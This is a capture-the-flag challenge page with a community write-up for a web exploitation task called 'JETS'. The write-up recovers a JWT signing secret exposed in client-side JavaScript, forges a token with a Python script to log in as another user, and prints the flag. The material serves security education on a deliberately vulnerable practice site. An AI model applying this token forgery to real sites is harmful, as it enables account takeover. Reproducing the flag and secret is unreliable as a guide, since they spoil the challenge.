CyberStudents Wordmark
Back to calendar

JETS

Category

Points

Author

Web exploitation

70

t

thee2d

Solves (113)

1Profile Picture for tudortudor12/15 3:06 pm
2Profile Picture for _vow__vow_12/15 3:06 pm
3Profile Picture for minipifminipif12/15 3:07 pm
4Profile Picture for krississykrississy12/15 3:08 pm
5Profile Picture for boomanten10boomanten1012/15 3:12 pm
6Profile Picture for dharneesh5555dharneesh555512/15 3:12 pm
7Profile Picture for raul_26raul_2612/15 3:13 pm
8Profile Picture for pligonsteinpligonstein12/15 3:30 pm
9Profile Picture for godlyavengergodlyavenger12/15 3:40 pm
10Profile Picture for last0xygenlast0xygen12/15 3:46 pm
11Profile Picture for booklover997booklover99712/15 4:04 pm
12Profile Picture for whofulwhoful12/15 4:32 pm
13Profile Picture for mr_mphmr_mph12/15 4:39 pm
14Profile Picture for d3dn0v4d3dn0v412/15 4:47 pm
15Profile Picture for l3benn_57464l3benn_5746412/15 5:00 pm
16Profile Picture for batterseabattersea12/15 6:40 pm
17Profile Picture for yacine.abhyacine.abh12/15 6:43 pm
18Profile Picture for ret2libcret2libc12/15 7:23 pm
19Profile Picture for andreicatandreicat12/16 2:01 am
20Profile Picture for blackpeach_64174blackpeach_6417412/16 2:30 am
21Profile Picture for iski_01_11718iski_01_1171812/16 4:10 am
22Profile Picture for masquerade8077masquerade807712/16 5:14 am
23Profile Picture for _avyra_avyra12/16 6:33 am
24Profile Picture for test123450604test12345060412/16 8:50 am
25Profile Picture for isee9917isee991712/16 9:55 am
26Profile Picture for _self_self12/16 10:23 am
27Profile Picture for puwanai.spuwanai.s12/16 11:59 am
28Profile Picture for dhanushmarreddi_75855dhanushmarreddi_7585512/16 1:10 pm
29Profile Picture for colonneilcolonneil12/16 4:12 pm
30Profile Picture for rex_i_arex_i_a12/16 4:15 pm
31Profile Picture for unpwnblunpwnbl12/16 5:32 pm
32Profile Picture for sanskariwolfsanskariwolf12/16 7:18 pm
33Profile Picture for f00varf00var12/16 7:59 pm
34Profile Picture for branoodlebranoodle12/17 4:01 am
35Profile Picture for silence_silence_12/17 4:33 am
36Profile Picture for torontokyo69torontokyo6912/17 5:03 am
37Profile Picture for zzunaidd023zzunaidd02312/17 6:04 am
38Profile Picture for .hackboredzz.hackboredzz12/17 7:02 am
39Profile Picture for sevgillim_.sevgillim_.12/17 9:32 am
40Profile Picture for nouxianouxia12/17 11:44 am
41Profile Picture for _4n3s_4n3s12/17 3:31 pm
42Profile Picture for abunesmaabunesma12/17 5:34 pm
43Profile Picture for zarnex__zarnex__12/17 9:41 pm
44Profile Picture for andreww4364andreww436412/18 12:33 am
45Profile Picture for vanatkavanatka12/18 8:26 am
46Profile Picture for ShrelicShrelic12/18 10:33 am
47Profile Picture for trixaitrixai12/18 10:56 am
48Profile Picture for pphreak_1001pphreak_100112/18 11:03 am
49Profile Picture for damian.28damian.2812/18 12:26 pm
50Profile Picture for __landon__landon12/18 1:46 pm
51Profile Picture for dustcoversdustcovers12/18 1:49 pm
52Profile Picture for _erray__erray_12/18 2:25 pm
53Profile Picture for athawathaw12/18 8:42 pm
54Profile Picture for fzhshzh_163fzhshzh_16312/18 11:54 pm
55Profile Picture for justk4l_justk4l_12/19 5:21 am
56Profile Picture for ots3299ots329912/19 9:54 am
57Profile Picture for helius1288helius128812/19 11:43 am
58Profile Picture for zimzi_37919zimzi_3791912/19 12:17 pm
59Profile Picture for infernosalexinfernosalex12/19 2:37 pm
60Profile Picture for sqr0tsqr0t12/19 6:04 pm
61Profile Picture for georgechkhaidzegeorgechkhaidze12/19 11:52 pm
62Profile Picture for ibarkayibarkay12/20 5:45 am
63Profile Picture for ryuun1cornryuun1corn12/20 11:06 am
64Profile Picture for naufalardhaninaufalardhani12/20 2:09 pm
65Profile Picture for transmitmitransmitmi12/20 8:02 pm
66Profile Picture for carnistascarnistas12/20 8:04 pm
67Profile Picture for obetobet12/21 11:08 am
68Profile Picture for org_benerorg_bener12/21 1:17 pm
69Profile Picture for _delhab__delhab_12/21 1:59 pm
70Profile Picture for namkeenbhujianamkeenbhujia12/21 6:00 pm
71Profile Picture for spectre06872spectre0687212/22 1:34 am
72Profile Picture for abdou__ammariabdou__ammari12/22 3:19 am
73Profile Picture for rotzkokowskirotzkokowski12/22 11:24 am
74Profile Picture for kingsbedwarskingsbedwars12/22 11:32 am
75Profile Picture for verbalverbalverbalverbal12/22 1:22 pm
76Profile Picture for hash0xchash0xc12/22 3:04 pm
77Profile Picture for captainblcaptainbl12/23 7:57 am
78Profile Picture for aarondewesaarondewes12/23 11:08 am
79Profile Picture for aquarheadaquarhead12/23 5:14 pm
80Profile Picture for manu7738manu773812/23 6:46 pm
81Profile Picture for smorayzsmorayz12/24 5:59 am
82Profile Picture for kar_bkar_b12/24 7:04 am
83Profile Picture for heartstollerheartstoller12/24 9:41 am
84Profile Picture for xtrimixtrimi12/24 10:57 am
85Profile Picture for re_tiredre_tired12/24 2:01 pm
86Profile Picture for h3lpme2exp10ith3lpme2exp10it12/24 3:38 pm
87Profile Picture for awwliveyetawwliveyet12/24 3:57 pm
88Profile Picture for testbkxtestbkx12/24 3:59 pm
89Profile Picture for zabatmoncefzabatmoncef12/24 5:30 pm
90Profile Picture for mattewastakenmattewastaken12/25 10:58 am
91Profile Picture for tildenjacksontildenjackson12/25 11:36 am
92Profile Picture for monstermanyana_47633monstermanyana_4763312/25 3:04 pm
93Profile Picture for m4422m442212/25 3:05 pm
94Profile Picture for 6oq.6oq.12/25 3:05 pm
95Profile Picture for darkitydarkity12/25 3:52 pm
96Profile Picture for sofianehbzsofianehbz12/25 6:25 pm
97Profile Picture for mtwiss_32447mtwiss_3244712/26 7:54 am
98Profile Picture for leyo7leyo712/26 10:16 am
99Profile Picture for papa9995papa999512/26 10:32 pm
100Profile Picture for tyx2019tyx201912/27 1:41 am
101Profile Picture for 0x0ffset0x0ffset12/27 3:24 pm
102Profile Picture for predatormonarchpredatormonarch12/27 3:59 pm
103Profile Picture for lamentxulamentxu12/28 2:45 am
104Profile Picture for rshm12rshm1212/28 10:19 am
105Profile Picture for fakeaviationistfakeaviationist12/28 11:49 am
106Profile Picture for .jstr_.jstr_12/28 9:02 pm
107Profile Picture for wilsonwei_cswilsonwei_cs12/29 9:17 am
108Profile Picture for kruknightkruknight12/30 1:02 am
109Profile Picture for incredible_axolotl_22791incredible_axolotl_2279112/30 7:25 am
110Profile Picture for baribal02baribal0212/30 8:57 am
111Profile Picture for tharun21tharun2112/31 1:45 am
112Profile Picture for sleuth123sleuth12312/31 11:25 am
113Profile Picture for zix4132zix413212/31 1:06 pm

Description

It seems like the Secret Society of K.U.N.A.L has invested in another business…Oh no.

If those planes come anywhere close to Santa—after his “adventure” in France—he’ll be scathed for good. Those reindeer don’t like inhaling kerosene!

Agent, we need you to infiltrate their system and gather some information for our engineers at Elves Intelligence. We believe the plane they’re using is a bit special…it may have been custom-built for K.U.N.A.L himself!

Here’s their website, agent: https://jets.csd.lol/. Best of luck.

You are only allowed to test in the scope https://jets.csd.lol/*. Blind brute-force request sending (e.g. using tools like DirBuster) can trigger Cloudflare rate limits. Do not attempt to bypass Cloudflare limits. Therefore, if you wish to brute-force, please limit your wordlists or attack scope.

Hint

There are no penalties for viewing hints. Hints are released 12 hours and 24 hours after the challenge releases.

Submit flag

Discuss this challenge with others in #🎄丨advent-of-ctf on our Discord server.

Write-up

.jstr_ (Jester)'s write-up was selected as the best write-up submitted for this challenge.

View this write-up on GitHub

When we go to the website, we can see the sign up option on the screen, so let's sign up using random credentials.

Once we sign up, we can go to Storage in our DevTools, where we see a cookie named token.

We can easily decrypt the Value of the token using jwt.io which can help us decode this JSON Web Token.

Encrypted Token :

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE3MzU0NDM5MjcsImV4cCI6MTczNTQ0NzUyNywic3ViIjoidGVzdCJ9.qW6uinpVkLKBAbLpwTiGH9dxElp7mMosW9DhuwPfZ9U

Decrypted Token :

{
  "iat": 1735443927,
  "exp": 1735447527,
  "sub": "test"
}

Here, iat and exp are time stamps, and sub is the username

Now, let's look at the source code. an interesting part of the js code is:

if (token) {
  const { sub } = jwtDecode(token, {
    secret: atob("MWRkMjJiYjQyNzBjYjE0NTcyMzIyZTAzNDI1YzAwNTgzZTAyYmY2M2Y1YzdhZjdkMmYzODdlMjRlN2Q1YjkzMQ=="),
  });
  console.log(sub);

  if (sub === atob("S1VuNEw=")) {
    footer.style.display = "block";
  }

In this example, we can see that secret is used for securing and validating JWT, and sub which is an username. both are encrypted in base64, so let's decode them.

secret : 1dd22bb4270cb14572322e03425c00583e02bf63f5c7af7d2f387e24e7d5b931
sub : KUn4L

to sign in KUn4L's account, we have to generate a JWT with their user id, time and we have to sign it with secret .

Here's the code in python that does exactly that:

import jwt
import time

secret = "1dd22bb4270cb14572322e03425c00583e02bf63f5c7af7d2f387e24e7d5b931"

payload = {
    "iat": int(time.time()),
    "exp": int(time.time()) + 3600,
    "sub": "KUn4L"
}

token = jwt.encode(payload, secret, algorithm="HS256")
print(token)

let's run the code:

jstr$ python main.py
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE3MzU0NDcwNDEsImV4cCI6MTczNTQ1MDY0MSwic3ViIjoiS1VuNEwifQ.0cVePmTMBbm5u6RVaYSDOScCmpn5HOIJV8fhvcVbd6E

We can now switch the token value by putting this JWT instead of the old one.

When we reload the website after switching JWT, the third picture we see, is a Walmart bag, which has the flag.

Flag: csd{Wh47_D1D_KUN4I_do_7h1S_71M3}

Need help with a challenge? Is a challenge broken? DM @ModMail in our Discord server.